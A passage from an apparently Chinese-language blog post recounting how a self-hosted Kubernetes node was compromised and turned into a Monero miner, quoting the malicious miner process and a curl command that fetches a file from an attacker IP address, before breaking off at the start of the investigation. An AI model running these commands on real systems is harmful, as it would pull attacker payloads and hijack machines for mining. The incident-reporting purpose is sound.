记一次 Kubernetes 集群被入侵，服务器变矿机

近期遇到了一次我们自建 Kubernetes 集群中某台机器被入侵挖矿，后续也找到了原因，所幸只是用来挖矿…网络安全是个严肃的问题，它总是在不经意间出现，等你反应过来却已经迟了。希望各位读者看完后也有所启发，去检查及加固自己的集群。入侵现象检查到某台机器中出现了异常进程./.system -o pool.supportxmr.com:3333 --donate-level=1 --coin=monero -u 46EPFzvnX5GH61ejkPpNcRNm8kVjs8oHS9VwCkKRCrJX27XEW2y1NPLfSa54DGHxqnKfzDUVW1jzBfekk3hrCVCmcurl -s http://45.9.148.35/scan_threads.dat简单来讲，就是我们的机器被用来挖矿了…问题出现后，我们第一时间关闭了docker，其实应该隔离下环境, 把挖矿程序dump下来，以便后续分析。具体原因排查iptables为空出现了异常进程，肯定是被入侵了，我首先看的是 iptables 。果不 ………………………………